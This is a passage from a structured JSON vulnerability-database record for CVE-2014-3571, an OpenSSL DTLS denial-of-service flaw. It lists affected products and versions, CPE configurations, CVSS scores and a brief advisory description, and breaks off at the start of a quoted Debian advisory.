"version": "2.1.9.790" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1.730" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x363071580" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "initiate master data service patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.5" }, { "model": "bladecenter t advanced management module 32r0835", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.801" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8734-" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "mobile wireless transport manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "mate design", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24078630" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.143" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "fujitsu m10-4s server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2230" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087330" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24089560" }, { "model": "powervu d9190 conditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.1" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "retail predictive application server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "15.0.2" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8730" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.132" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x353071600" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.0(4.29)" }, { "model": "retail predictive application server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "14.0.3" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "mate live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0-12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7989" }, { "model": "mobile security suite mss", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0" }, { "model": "e-business suite", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.5.10.2" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1.104" }, { "model": "cognos controller if3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8740" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "initiate master data service provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087180" }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8731-" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "systems insight manager sp6", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1.73" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "45000" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "project openssl 0.9.8zc", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310054570" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.10.3" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3104.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1841" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "cognos controller fp1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.2(3.1)" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.4" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.179" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079140" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.15" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1886" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087520" }, { "model": "vds service broker", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x638370" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "app for vmware", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "bladecenter -e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8677" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.2" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "communications policy management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "004.000(1233)" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2.10" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.841" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "cloud", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "webex meetings server 2.5mr2", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.103" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "fujitsu m10-1 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2230" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87104.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.7" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "53000" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.0.121" }, { "model": "ios 15.5 s", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2" }, { "model": "prime performance manager for sps ppm sp1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.6" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "session border controller for enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "retail predictive application server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.3.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.1.2" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x44079170" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "systems insight manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79190" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.750" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325054580" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "project openssl 0.9.8u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)5.1" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" } ], "sources": [ { "db": "BID", "id": "71937" }, { "db": "JVNDB", "id": "JVNDB-2014-007552" }, { "db": "NVD", "id": "CVE-2014-3571" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "0.9.8zc", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3571" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130548" }, { "db": "PACKETSTORM", "id": "130545" } ], "trust": 0.6 }, "cve": "CVE-2014-3571", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2014-3571", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-3571", "trust": 1.8, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-3571", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3571" }, { "db": "JVNDB", "id": "JVNDB-2014-007552" }, { "db": "NVD", "id": "CVE-2014-3571" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted DTLS message that is processed with a different read operation for the handshake header than for the handshake body, related to the dtls1_get_record function in d1_pkt.c and the ssl3_read_n function in s3_pkt.c. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. \nAn attacker may exploit this issue to crash the application, resulting in denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3125-1 